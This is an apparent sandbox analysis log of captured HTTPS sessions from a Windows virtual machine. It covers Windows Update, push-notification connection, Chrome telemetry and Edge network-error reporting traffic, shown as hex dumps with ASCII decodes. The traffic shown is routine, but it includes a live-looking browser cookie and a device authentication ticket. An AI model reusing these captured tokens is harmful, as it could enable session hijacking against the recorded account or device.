                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.64981413.85.23.86443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:57 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Kvu6flRNlG2X2Hs&MD=Y7YGDEsS HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept: */*
                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                        Host: slscr.update.microsoft.com
                                                                                        2024-07-24 05:14:57 UTC560INHTTP/1.1 200 OK
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Content-Type: application/octet-stream
                                                                                        Expires: -1
                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                        MS-CorrelationId: 9ac2b27a-9526-409d-b7fa-05a131a7229d
                                                                                        MS-RequestId: 629514f8-229c-49cd-8d60-973756d5f968
                                                                                        MS-CV: kjasU29btES8EitR.0
                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Date: Wed, 24 Jul 2024 05:14:57 GMT
                                                                                        Connection: close
                                                                                        Content-Length: 30005
                                                                                        2024-07-24 05:14:57 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                        2024-07-24 05:14:57 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        26192.168.2.64983940.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:15:13 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 52 6e 4f 6c 2b 77 42 50 76 45 36 48 41 54 4f 4b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 61 39 37 62 30 64 36 36 66 64 63 32 32 36 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: RnOl+wBPvE6HATOK.1Context: 84a97b0d66fdc226
                                                                                        2024-07-24 05:15:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:15:13 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 52 6e 4f 6c 2b 77 42 50 76 45 36 48 41 54 4f 4b 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 61 39 37 62 30 64 36 36 66 64 63 32 32 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: RnOl+wBPvE6HATOK.2Context: 84a97b0d66fdc226<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:15:13 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 52 6e 4f 6c 2b 77 42 50 76 45 36 48 41 54 4f 4b 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 34 61 39 37 62 30 64 36 36 66 64 63 32 32 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: RnOl+wBPvE6HATOK.3Context: 84a97b0d66fdc226<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:15:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:15:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4d 31 62 6c 66 49 73 4b 74 30 75 4f 32 34 79 59 37 37 6e 78 75 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: M1blfIsKt0uO24yY77nxug.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.649848142.250.186.1424436860C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:15:20 UTC1261OUTPOST /log?hasfast=true&authuser=0&format=json HTTP/1.1
                                                                                        Host: play.google.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 829
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.134"
                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://accounts.google.com
                                                                                        X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: NID=516=HD786DnUmOR9n-ge3dU5EQwcmvwRqtGjsNDZ0qb63vwoW67xMW7WVTjAIRPi1cDtwNBvnh8ExVPW68WW_oelHT7ZGaF9D8R_9P-gsS3TzytI7hd6CsRxGsuUI30pgK8KvuV5vB-jEiMYw1vC9YxT7lFuyWyF8Pa4eHTGnMWPpkA
                                                                                        2024-07-24 05:15:20 UTC829OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 69 64 65 6e 74 69 74 79 66 72 6f 6e 74 65 6e 64 61 75 74 68 75 69 73 65 72 76 65 72 5f 32 30 32 34 30 37 32 31 2e 30 37 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 33 2c 30 2c 30
                                                                                        Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_identityfrontendauthuiserver_20240721.07_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[3,0,0
                                                                                        2024-07-24 05:15:20 UTC523INHTTP/1.1 200 OK
                                                                                        Access-Control-Allow-Origin: https://accounts.google.com
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Allow-Headers: X-Playlog-Web
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Date: Wed, 24 Jul 2024 05:15:20 GMT
                                                                                        Server: Playlog
                                                                                        Cache-Control: private
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Accept-Ranges: none
                                                                                        Vary: Accept-Encoding
                                                                                        Connection: close
                                                                                        Transfer-Encoding: chunked
                                                                                        2024-07-24 05:15:20 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                        Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                        2024-07-24 05:15:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.64987823.40.179.374432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:15:34 UTC442OUTOPTIONS /api/report?cat=bingbusiness HTTP/1.1
                                                                                        Host: bzib.nelreports.net
                                                                                        Connection: keep-alive
                                                                                        Origin: https://business.bing.com
                                                                                        Access-Control-Request-Method: POST
                                                                                        Access-Control-Request-Headers: content-type
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:15:34 UTC360INHTTP/1.1 200 OK
                                                                                        Content-Length: 0
                                                                                        Access-Control-Allow-Headers: content-type
                                                                                        Date: Wed, 24 Jul 2024 05:15:34 GMT
                                                                                        Connection: close
                                                                                        PMUSER_FORMAT_QS:
                                                                                        X-CDN-TraceId: 0.25b22817.1721798134.4f5e976
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Methods: *
                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                        Access-Control-Allow-Origin: *


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.64988123.40.179.374432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:15:35 UTC382OUTPOST /api/report?cat=bingbusiness HTTP/1.1
                                                                                        Host: bzib.nelreports.net
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 465
                                                                                        Content-Type: application/reports+json
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:15:35 UTC465OUTData Raw: 5b 7b 22 61 67 65 22 3a 36 30 33 34 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 32 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 33 2e 31 30 37 2e 36 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 31 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 62 69 6e 67
                                                                                        Data Ascii: [{"age":60349,"body":{"elapsed_time":725,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"13.107.6.158","status_code":401,"type":"http.error"},"type":"network-error","url":"https://business.bing
                                                                                        2024-07-24 05:15:35 UTC358INHTTP/1.1 200 OK
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Date: Wed, 24 Jul 2024 05:15:35 GMT
                                                                                        Content-Length: 21
                                                                                        Connection: close
                                                                                        PMUSER_FORMAT_QS:
                                                                                        X-CDN-TraceId: 0.25b22817.1721798135.4f5eb45
                                                                                        Access-Control-Allow-Credentials: false
                                                                                        Access-Control-Allow-Methods: *
                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                        Access-Control-Allow-Origin: *
                                                                                        2024-07-24 05:15:35 UTC21INData Raw: 50 72 6f 63 65 73 73 65 64 20 74 68 65 20 72 65 71 75 65 73 74
                                                                                        Data Ascii: Processed the request


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        30192.168.2.64990240.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:15:42 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 74 7a 69 46 32 36 6e 6b 36 6b 79 64 67 37 30 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 63 32 34 30 31 30 63 33 32 36 39 64 30 35 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: tziF26nk6kydg703.1Context: 3dc24010c3269d05
                                                                                        2024-07-24 05:15:42 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:15:42 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 74 7a 69 46 32 36 6e 6b 36 6b 79 64 67 37 30 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 63 32 34 30 31 30 63 33 32 36 39 64 30 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
                                                                                        Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: tziF26nk6kydg703.2Context: 3dc24010c3269d05<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAdK90ncoUiekl9XszFvxrcmgag9H1OhqgjJK0BXKl8U89pusgBW9/FuP5G5JeJ9zFfpTxBlbhwbc3NkRw2GswabgY42LqgdT+KzIxkDgbYuEps
                                                                                        2024-07-24 05:15:42 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 74 7a 69 46 32 36 6e 6b 36 6b 79 64 67 37 30 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 63 32 34 30 31 30 63 33 32 36 39 64 30 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: tziF26nk6kydg703.3Context: 3dc24010c3269d05<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                        2024-07-24 05:15:42 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                        Data Ascii: 202 1 CON 58
                                                                                        2024-07-24 05:15:42 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4e 49 6f 6b 62 64 50 77 64 55 2b 68 4f 44 41 4a 46 6f 49 6b 42 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                        Data Ascii: MS-CV: NIokbdPwdU+hODAJFoIkBA.0Payload parsing failed.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        31192.168.2.64996940.115.3.253443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:16:15 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 68 48 4a 63 2f 78 52 6f 37 30 65 51 68 78 6a 6f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 66 39 63 65 38 64 64 38 35 31 64 34 61 31 0d 0a 0d 0a
                                                                                        Data Ascii: CNT 1 CON 305MS-CV: hHJc/xRo70eQhxjo.1Context: 60f9ce8dd851d4a1
                                                                                        2024-07-24 05:16:15 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                        2024-07-24 05:16:15 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 68 48 4a 63 2f 78 52 6f 37 30 65 51 68 78 6a 6f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 30 66 39 63 65 38 64 64 38 35 31 64 34 61 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 64 4b 39 30 6e 63 6f 55 69 65 6b 6c 39 58 73 7a 46 76 78 72 63 6d 67 61 67 39 48 31 4f 68 71 67 6a 4a 4b 30 42 58 4b 6c 38 55 38 39 70 75 73 67 42 57 39 2f 46 75 50 35 47 35 4a 65 4a 39 7a 46 66 70 54 78 42 6c 62 68 77 62 63 33 4e 6b 52 77 32 47 73 77 61 62 67 59 34 32 4c 71 67 64 54 2b 4b 7a 49 78 6b 44 67 62 59 75 45 70 73
